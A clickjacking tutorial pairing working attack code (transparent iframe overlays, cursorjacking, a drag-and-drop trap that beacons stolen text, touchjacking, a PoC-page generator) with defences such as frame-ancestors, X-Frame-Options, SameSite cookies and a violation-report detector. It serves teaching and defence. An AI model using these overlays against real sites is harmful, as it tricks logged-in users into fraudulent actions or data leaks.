Clickjacking (UI Redress Attack) Comprehensive Guide

What is Clickjacking?

Clickjacking (also called a UI redress attack) tricks a user into clicking something other than what they perceive. Typically the attacker loads the target site in a transparent or misaligned iframe layered over decoy content on a page the attacker controls; the click is delivered to the framed page together with the victim's existing session cookies, so the victim performs an authenticated action on the target that they never intended.

Clickjacking Impact

The damage is bounded by what the hijacked clicks can trigger in the authenticated target, which in practice covers:

  • Unauthorized actions performed by users (settings changes, purchases, permission grants)
  • Account hijacking (e.g. changing the recovery e-mail or authorizing an OAuth client)
  • Financial fraud (confirming transfers or payments)
  • Data theft (via drag-and-drop, or by granting camera or microphone access)
  • Malware installation (clicking through download or install prompts)
  • Social media manipulation (likejacking, follow/share hijacking)

Red Team Techniques (Offensive)

1. Basic Clickjacking Attacks

Transparent Overlay

<!-- Decoy underneath (z-index 1); the framed target sits on top (z-index 2),
     so the click goes to the target's real button, not the decoy. -->
<button style="position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);z-index:1;">
  Click Me (Innocent Button)
</button>
<iframe src="https://vulnerable-site.com"
        style="opacity:0.5;position:absolute;top:0;left:0;width:100%;height:100%;z-index:2;"></iframe>

opacity:0.5 is only for aligning the frame while building the page; a real attack drops it to (nearly) zero and shifts top/left, negative values included, until the target control lies exactly under the decoy. The frame must be on top: if the decoy button has the higher z-index, the click lands on the decoy and nothing happens in the target.

Cursorjacking

<style>
  body { cursor: none; }  /* hide the real pointer */
  #fake-cursor { position: absolute; pointer-events: none; z-index: 10; }
</style>
<img id="fake-cursor" src="cursor.png">
<script>
  // Draw the fake pointer offset from the real one: the user aims the visible
  // cursor at a decoy while the real click lands 15px away on the target
  // control (a framed page or a browser permission prompt).
  document.addEventListener('mousemove', e => {
    const c = document.getElementById('fake-cursor');
    c.style.left = (e.pageX + 15) + 'px';
    c.style.top = (e.pageY + 15) + 'px';
  });
</script>

Without cursor: none the user would see two pointers and the illusion fails; the offset is chosen so that the visible cursor sits on the decoy when the real cursor sits on the target.

2. Advanced Techniques

Drag-and-Drop Attacks

<!-- Decoy "game": the user drags what they think is a game piece into the box;
     the drag actually starts on text inside the hidden framed page. -->
<div id="drop-zone" style="position:absolute;top:300px;left:100px;width:200px;height:100px;border:1px dashed #999;"
     ondragover="event.preventDefault()"
     ondrop="event.preventDefault(); leak(event.dataTransfer.getData('text'))">Drop the piece here</div>
<iframe src="https://vulnerable-site.com/drag-sensitive-area"
        style="opacity:0;position:absolute;top:0;left:0;width:600px;height:200px;"></iframe>
<script>
  // Exfiltrate the dropped text to the attacker's collector (placeholder path)
  function leak(text) { navigator.sendBeacon('/collect', text); }
</script>

Unlike a plain click, a drag carries data: text, a link, or a form value dragged out of the framed page can be read by the attacker's drop target, and the reverse direction (dragging attacker text into a form field inside the frame) can pre-fill forms. Modern browsers restrict drag-and-drop data crossing between a cross-origin frame and its parent, so treat this as a legacy technique and verify it on the target browser before relying on it in an engagement.

Touchjacking (Mobile)

<div style="position:fixed;top:0;left:0;width:100%;height:100%;">
  <!-- invisible framed target receives the tap -->
  <iframe src="https://mobile-app.com" style="opacity:0;width:100%;height:100%;border:0;"></iframe>
  <!-- decoy drawn on top; pointer-events:none lets the touch pass through to the frame -->
  <div style="position:absolute;top:200px;left:100px;width:200px;height:50px;pointer-events:none;background:#2a7;color:#fff;text-align:center;line-height:50px;">Tap to continue</div>
</div>

Touchjacking is the same overlay attack on touch devices. It tends to work better there because there is no cursor to give the misalignment away and the small viewport makes the framed page easy to hide off-screen. The same framing headers used on the desktop stop it.

3. Real-World Attack Scenarios

Social Media Likejacking

1. Attacker embeds the social network's real "Like" button for the attacker's page in an invisible iframe, positioned over a decoy such as a video play button
2. User clicks what appears to be the play button or a news article
3. The click lands on the framed Like button, so the logged-in user endorses the malicious page and spreads it to their contacts

Bank Transfer Hijacking

1. User is logged in to online banking, so the session cookies are still valid
2. User visits a malicious page that frames the bank's transfer page invisibly, with the transfer details pre-populated wherever the target accepts them from the URL
3. User clicks a "Show funny cat" button that is aligned with the bank's "Confirm transfer" button underneath

Both scenarios require that the target can be framed (no X-Frame-Options or frame-ancestors) and that the browser still sends the victim's cookies to the framed page (no SameSite restriction); either control alone breaks the chain.

4. Tools & Automation

Testing Tools

  • Burp Suite Clickbandit (records a click sequence on the target and generates a PoC page)
  • OWASP ZAP (passive scan alerts on a missing X-Frame-Options / frame-ancestors header)
  • ClickjackingTest

Exploitation Frameworks

  • BeEF (Browser Exploitation Framework)
  • Social Engineering Toolkit (SET)
  • Custom iframe generators
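As an added example (not from the original page or any of the tools listed above), the following Node.js script is a small iframe generator for the transparent-overlay technique: given a target URL and the position and size of the control to hijack, it emits a PoC page with the decoy underneath and the framed target on top, offset so the control sits under the decoy. The target URL, coordinates, decoy text and the collector-free layout are constructed placeholders; replace them with what you measured on an in-scope target.

```javascript
// Added example (not from the page or any tool above): generate a clickjacking
// proof-of-concept page using the transparent-overlay technique. The target
// URL, coordinates and decoy text passed in below are constructed placeholders.
'use strict';

// Escape text and attribute values so the generated PoC is not itself
// injectable if the inputs come from a form or a CLI argument.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Where the decoy sits on the attacker page. The iframe is shifted so the
// target control ends up exactly underneath it.
const DECOY_LEFT = 200;
const DECOY_TOP = 200;

// opts.targetUrl   page to frame (http(s) only)
// opts.buttonX/Y   position of the control inside the target page, in CSS px
// opts.buttonW/H   its size, so the decoy covers the same hit area
// opts.opacity     0.5 while aligning, ~0 for the finished PoC (default)
// opts.decoyText   label shown on the decoy button
function buildClickjackPoc(opts) {
  const o = Object.assign({ decoyText: 'Click to continue', opacity: 0.0001 }, opts);
  if (!/^https?:\/\//i.test(o.targetUrl)) throw new Error('targetUrl must be http(s)');
  for (const k of ['buttonX', 'buttonY', 'buttonW', 'buttonH']) {
    if (!Number.isFinite(o[k]) || o[k] < 0) throw new Error(`${k} must be a non-negative number`);
  }
  if (!(o.opacity >= 0 && o.opacity <= 1)) throw new Error('opacity must be within [0, 1]');
  // Negative offsets are valid CSS: they shift the hidden frame so that the
  // control at (buttonX, buttonY) lands at (DECOY_LEFT, DECOY_TOP).
  const frameLeft = DECOY_LEFT - o.buttonX;
  const frameTop = DECOY_TOP - o.buttonY;
  return [
    '<!doctype html>',
    '<html><head><meta charset="utf-8"><title>Clickjacking PoC</title></head><body>',
    // Decoy underneath (z-index 1) ...
    `<button style="position:absolute;left:${DECOY_LEFT}px;top:${DECOY_TOP}px;` +
      `width:${o.buttonW}px;height:${o.buttonH}px;z-index:1;">${escapeHtml(o.decoyText)}</button>`,
    // ... framed target on top (z-index 2), oversized so no scrollbars appear.
    `<iframe src="${escapeHtml(o.targetUrl)}" scrolling="no" ` +
      `style="position:absolute;left:${frameLeft}px;top:${frameTop}px;width:3000px;height:3000px;` +
      `border:0;opacity:${o.opacity};z-index:2;"></iframe>`,
    '</body></html>',
  ].join('\n');
}

// Stand-alone demo: print a PoC for a constructed target at half opacity
// (the alignment view); drop opacity to the default for the finished page.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(buildClickjackPoc({
    targetUrl: 'https://vulnerable-site.com/transfer',
    buttonX: 640, buttonY: 480, buttonW: 120, buttonH: 40,
    decoyText: 'Show funny cat', opacity: 0.5,
  }));
}
```

Run it with node and redirect the output to an HTML file; open that file in a browser while logged in to the (authorized) target to confirm the control is covered, then lower the opacity. If the target sends X-Frame-Options or frame-ancestors the iframe stays blank, which is the result you want to see on a hardened site.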

Blue Team Defenses (Defensive)

1. Frame Busting Techniques

JavaScript Frame Busting

The classic one-liner (if (top != self) top.location = self.location;) is easily defeated: the attacker can frame the page with the iframe sandbox attribute (without allow-top-navigation), or suppress the redirect with onbeforeunload tricks, and the page then renders inside the frame anyway. The pattern recommended by OWASP hides the page by default and reveals it only when it is not framed, so a blocked redirect still leaves nothing to click on:

<style id="antiClickjack">body { display: none !important; }</style>
<script>
  if (self === top) document.getElementById('antiClickjack').remove(); // not framed: reveal the page
  else top.location = self.location;                                   // framed: break out
</script>

Treat frame busting as defense in depth for clients that honor neither X-Frame-Options nor CSP frame-ancestors, never as the primary control.

X-Frame-Options Header

// HTTP Header
X-Frame-Options: DENY
// or
X-Frame-Options: SAMEORIGIN

DENY refuses all framing; SAMEORIGIN allows framing only by pages from the same origin. The older ALLOW-FROM value is obsolete and ignored by current browsers, so a per-partner allow-list needs CSP frame-ancestors. The header must be sent as an HTTP response header (it has no effect in a <meta> tag), and when a response also carries an enforcing frame-ancestors directive, browsers that support CSP use that directive and ignore X-Frame-Options.

2. Content Security Policy

CSP Frame Ancestors

Content-Security-Policy: frame-ancestors 'none';
// or
Content-Security-Policy: frame-ancestors 'self';

'none' forbids all framing and 'self' permits only the same origin; to allow specific partners, list their origins after 'self' (for example frame-ancestors 'self' https://partner.example). frame-ancestors is honored only in the HTTP header, not in a <meta http-equiv> policy, and it is not covered by default-src, so it must be stated explicitly.

Reporting CSP Violations

Content-Security-Policy: frame-ancestors 'none'; report-uri /csp-violation-report

Violations are POSTed as JSON to the endpoint, which makes attempted framing visible to the blue team. To roll out without breaking a legitimate embedding, send the same directive first in a Content-Security-Policy-Report-Only header, which reports but does not block. report-uri is deprecated in favor of report-to (the Reporting API) but remains widely supported; sending both during the transition is common.
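As an added example (not from the original page), the following Node.js script evaluates a response's clickjacking protection from its headers, applying the precedence rules described for X-Frame-Options and frame-ancestors above: an enforcing frame-ancestors directive overrides X-Frame-Options, a Report-Only policy does not block, and ALLOW-FROM or unrecognized X-Frame-Options values are ignored by browsers and so count as no protection. The header sets in SAMPLES are constructed, not captured from any real site, and the script performs no network requests; paste in the headers from your own curl -I output.

```javascript
// Added example (not from the page): judge a response's framing protection from
// its headers the way a browser would. The header sets in SAMPLES are
// constructed for illustration, not captured from any real site.
'use strict';

// Case-insensitive lookup that tolerates repeated headers given as arrays.
function headerValues(headers, name) {
  const out = [];
  for (const [k, v] of Object.entries(headers)) {
    if (k.toLowerCase() !== name) continue;
    for (const item of Array.isArray(v) ? v : [v]) out.push(String(item).trim());
  }
  return out;
}

// Parse "dir src src; dir2 src" into Map(dir -> [src...]). Per the CSP spec a
// directive repeated inside one header is ignored after its first occurrence.
function parseCsp(value) {
  const directives = new Map();
  for (const part of value.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length && !directives.has(tokens[0].toLowerCase())) {
      directives.set(tokens[0].toLowerCase(), tokens.slice(1));
    }
  }
  return directives;
}

// Does a frame-ancestors source list let any origin frame the page?
function allowsAnyAncestor(sources) {
  return sources.some((s) => s === '*' || /^https?:$/i.test(s));
}

// Returns { protected, mechanism, notes }. Precedence follows the browsers:
// an enforcing CSP frame-ancestors directive overrides X-Frame-Options;
// Report-Only never blocks; ALLOW-FROM and unknown XFO values are ignored by
// current browsers and therefore count as no protection.
function assessFramingProtection(headers) {
  const notes = [];
  for (const csp of headerValues(headers, 'content-security-policy')) {
    const fa = parseCsp(csp).get('frame-ancestors');
    if (!fa) continue;
    if (allowsAnyAncestor(fa.map((s) => s.toLowerCase()))) {
      return { protected: false, mechanism: 'csp', notes: [`frame-ancestors permits any origin: ${fa.join(' ')}`] };
    }
    return { protected: true, mechanism: 'csp', notes: [`frame-ancestors ${fa.join(' ')}`] };
  }
  if (headerValues(headers, 'content-security-policy-report-only').some((v) => parseCsp(v).has('frame-ancestors'))) {
    notes.push('frame-ancestors appears only in Report-Only: it reports but does not block');
  }
  const xfo = headerValues(headers, 'x-frame-options').map((v) => v.toLowerCase());
  if (xfo.length === 0) {
    notes.push('no X-Frame-Options and no enforcing frame-ancestors');
    return { protected: false, mechanism: 'none', notes };
  }
  if (xfo.length > 1) notes.push(`repeated X-Frame-Options (${xfo.join(', ')}): behaviour differs by browser, verify manually`);
  if (xfo.every((v) => v === 'deny' || v === 'sameorigin')) {
    return { protected: true, mechanism: 'x-frame-options', notes: notes.concat([`X-Frame-Options: ${xfo.join(', ')}`]) };
  }
  if (xfo.some((v) => v.startsWith('allow-from'))) notes.push('ALLOW-FROM is obsolete and ignored by current browsers; use frame-ancestors');
  else notes.push(`unrecognised X-Frame-Options value "${xfo.join(', ')}" is ignored by browsers`);
  return { protected: false, mechanism: 'x-frame-options', notes };
}

// Constructed sample responses (not real traffic) that exercise each rule.
const SAMPLES = {
  denied: { 'X-Frame-Options': 'DENY' },
  cspWins: { 'X-Frame-Options': 'ALLOWALL', 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'" },
  wildcard: { 'content-security-policy': 'frame-ancestors *' },
  reportOnly: { 'Content-Security-Policy-Report-Only': "frame-ancestors 'none'" },
  allowFrom: { 'X-Frame-Options': 'ALLOW-FROM https://partner.example' },
  partners: { 'Content-Security-Policy': "frame-ancestors 'self' https://partner.example" },
  nothing: { 'Content-Type': 'text/html' },
};

function assessSamples() {
  const out = {};
  for (const [name, headers] of Object.entries(SAMPLES)) out[name] = assessFramingProtection(headers);
  return out;
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, r] of Object.entries(assessSamples())) {
    console.log(`${name.padEnd(11)} ${r.protected ? 'PROTECTED  ' : 'UNPROTECTED'} via ${r.mechanism}: ${r.notes.join('; ')}`);
  }
}
```

The script only sees headers, so it cannot tell you about a frame-ancestors directive placed in a <meta> tag (browsers ignore it there anyway) or about SameSite cookie settings; for a full answer, also load the page in an iframe from a different origin in a real browser and check the console.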

3. Additional Protections

Visual Confirmation

// Add a CAPTCHA or confirmation step for sensitive actions
function confirmAction() {
  return confirm("Are you sure you want to perform this action?");
}

A confirmation step helps because the prompt is rendered by the browser, outside the attacker's overlay, so the user sees what is really being asked (Chromium-based browsers no longer display confirm() from cross-origin iframes at all, in which case it returns false and the action is abandoned). It is still a weak control: prefer re-authentication, or a second page the user must read, for money movement and account-recovery changes.

Session Timeouts

// Short idle timeout for sensitive applications (Java Servlet API)
session.setMaxInactiveInterval(300); // 5 minutes

Clickjacking only works against a victim who is currently logged in to the target, so a shorter idle timeout shrinks the window in which a lured user is exploitable.

SameSite Cookies

Marking the session cookie SameSite=Lax (or Strict) means the browser does not send it on requests a cross-site page makes by embedding an iframe, so the framed page loads logged out and the hijacked click hits nothing useful. Chromium-based browsers treat cookies without the attribute as Lax; others do not, so set it explicitly and verify it on the session cookie.

4. Framework Protections

Django Protection

# settings.py
MIDDLEWARE = [
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    ...
]
# Value the middleware sends; 'DENY' is the default since Django 3.0
# (earlier releases defaulted to 'SAMEORIGIN').
X_FRAME_OPTIONS = 'DENY'

The middleware only sets X-Frame-Options; views that must legitimately be framed can opt out with the decorators in django.views.decorators.clickjacking (xframe_options_sameorigin, xframe_options_exempt). A CSP frame-ancestors header has to be added separately, for example with third-party CSP middleware or at the web server.

Spring Security

Spring Security sends X-Frame-Options: DENY by default, so nothing is required unless the application must be framed by its own origin. WebSecurityConfigurerAdapter is deprecated since Spring Security 5.7; the current style registers a SecurityFilterChain bean:

import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.web.SecurityFilterChain;

@Configuration
public class WebSecurityConfig {
    @Bean
    SecurityFilterChain filterChain(HttpSecurity http) throws Exception {
        http.headers(headers -> headers
            // relax the default DENY to SAMEORIGIN ...
            .frameOptions(frame -> frame.sameOrigin())
            // ... and send the CSP equivalent, which current browsers prefer
            .contentSecurityPolicy(csp -> csp.policyDirectives("frame-ancestors 'self'")));
        return http.build();
    }
}

5. Monitoring & Detection

Detection Methods

  • CSP frame-ancestors violation reports arriving at the report endpoint: the clearest signal, since each one is a framing attempt the policy blocked
  • Frame-busting script firing: when top !== self the script can beacon the event (and document.referrer, if the embedder's Referrer-Policy allows it) before redirecting
  • Page loads of sensitive pages whose Referer is a foreign origin, again subject to the embedding page's Referrer-Policy
  • Sensitive actions submitted without the page views that normally precede them, or bursts of the same action from many unrelated users

Response Actions

  • Force re-authentication before the action completes
  • Temporary account lock
  • User notification
  • Block or report the framing origin (abuse contact, takedown request)
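As an added example (not part of the original page), the following Node.js script implements two of the detection methods above: triage of CSP violation reports, keeping only frame-ancestors violations in either the legacy report-uri body or the Reporting API batch format, and a Referer check over access-log lines for sensitive paths. SITE_ORIGIN, the sensitive paths, and every report and log line are constructed for illustration, not real traffic.

```javascript
// Added example (not from the page): turn two detection signals into code,
// triage of CSP frame-ancestors violation reports and a Referer check over
// access logs. Every report and log line below is a constructed sample, and
// SITE_ORIGIN is an assumed value for the protected application.
'use strict';

const SITE_ORIGIN = 'https://bank.example';

// Accept both report formats browsers send: the legacy report-uri body
// {"csp-report": {...}} with kebab-case keys, and the Reporting API batch
// [{"type": "csp-violation", "body": {...}}] with camelCase keys.
function extractCspReports(payload) {
  const data = typeof payload === 'string' ? JSON.parse(payload) : payload;
  if (Array.isArray(data)) return data.filter((r) => r && r.type === 'csp-violation').map((r) => r.body);
  if (data && data['csp-report']) return [data['csp-report']];
  return [];
}

function originOf(url) {
  try { return new URL(url).origin; } catch (e) { return null; }
}

// Keep only frame-ancestors violations and normalise the fields we care about.
// The referrer is the framing page when the embedder's Referrer-Policy lets it
// through; it is often stripped, so 'unknown' must be expected.
function framingViolations(payload) {
  const out = [];
  for (const r of extractCspReports(payload)) {
    const directive = r['effective-directive'] || r.effectiveDirective || r['violated-directive'] || r.violatedDirective || '';
    if (!directive.toLowerCase().startsWith('frame-ancestors')) continue;
    out.push({
      page: r['document-uri'] || r.documentURL || '',
      framedBy: originOf(r.referrer || '') || 'unknown',
      disposition: r.disposition || 'enforce',
    });
  }
  return out;
}

// Parse Apache/nginx "combined" log lines and flag requests to sensitive paths
// whose Referer is another origin: a page normally reached only from inside
// the app was loaded from a foreign page, which is the framing pattern.
const COMBINED = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;
function suspiciousReferers(lines, sensitivePaths) {
  const hits = [];
  for (const line of lines) {
    const m = COMBINED.exec(line);
    if (!m) continue;
    const [, ip, time, method, path, status, referer] = m;
    if (!sensitivePaths.some((p) => path.startsWith(p))) continue;
    const refOrigin = originOf(referer);
    if (referer === '-' || refOrigin === SITE_ORIGIN) continue; // direct or in-app navigation
    hits.push({ ip, time, method, path, status, referer: refOrigin || referer });
  }
  return hits;
}

// ---- constructed samples (not real traffic) ------------------------------
const LEGACY_REPORT = JSON.stringify({ 'csp-report': {
  'document-uri': 'https://bank.example/transfer/confirm',
  referrer: 'https://evil.example/cats.html',
  'violated-directive': 'frame-ancestors',
  'effective-directive': 'frame-ancestors',
  'original-policy': "frame-ancestors 'none'; report-uri /csp-violation-report",
  disposition: 'enforce',
} });
const REPORTING_API_BATCH = JSON.stringify([
  { type: 'csp-violation', age: 10, url: 'https://bank.example/transfer/confirm',
    body: { documentURL: 'https://bank.example/transfer/confirm', referrer: '', effectiveDirective: 'frame-ancestors', disposition: 'report' } },
  { type: 'csp-violation', age: 12, url: 'https://bank.example/',
    body: { documentURL: 'https://bank.example/', referrer: '', effectiveDirective: 'script-src-elem', disposition: 'enforce' } },
]);
const LOG_LINES = [
  '203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /transfer/confirm?to=ACC1&amt=500 HTTP/1.1" 200 5120 "https://evil.example/cats.html" "Mozilla/5.0"',
  '198.51.100.2 - - [10/Oct/2024:13:55:40 +0000] "GET /transfer/confirm HTTP/1.1" 200 5120 "https://bank.example/transfer" "Mozilla/5.0"',
  '198.51.100.3 - - [10/Oct/2024:13:55:41 +0000] "GET /transfer/confirm HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '198.51.100.4 - - [10/Oct/2024:13:55:42 +0000] "GET /static/app.css HTTP/1.1" 200 900 "https://evil.example/" "Mozilla/5.0"',
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(framingViolations(LEGACY_REPORT), framingViolations(REPORTING_API_BATCH));
  console.log(suspiciousReferers(LOG_LINES, ['/transfer/']));
}
```

A report with disposition "report" comes from a Report-Only policy, so the framing was not blocked and the event deserves a faster response than an "enforce" report. The Referer check is only a heuristic: legitimate deep links from mail clients or partner sites also produce foreign referrers, so score it alongside the CSP reports rather than alerting on it alone.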

Additional Resources & References

Clickjacking Mitigation Checklist

  • Send Content-Security-Policy: frame-ancestors ('none', 'self' or an explicit allow-list) as an HTTP header on every HTML response, including error pages
  • Send X-Frame-Options: DENY or SAMEORIGIN alongside it for browsers without CSP support
  • Mark session cookies SameSite=Lax or Strict so framed pages load logged out
  • Add frame-busting JavaScript only as a secondary defense
  • Require re-authentication or an explicit confirmation step for sensitive actions
  • Educate users about potential clickjacking risks
  • Regularly test your defenses: load each sensitive page in an iframe from another origin and confirm it is blocked
  • Collect CSP violation reports and monitor frame-busting events
  • Keep idle session timeouts short for sensitive applications

Legal Notice

This content is provided for educational purposes only. Never test security vulnerabilities against systems without explicit permission. Unauthorized testing may violate laws.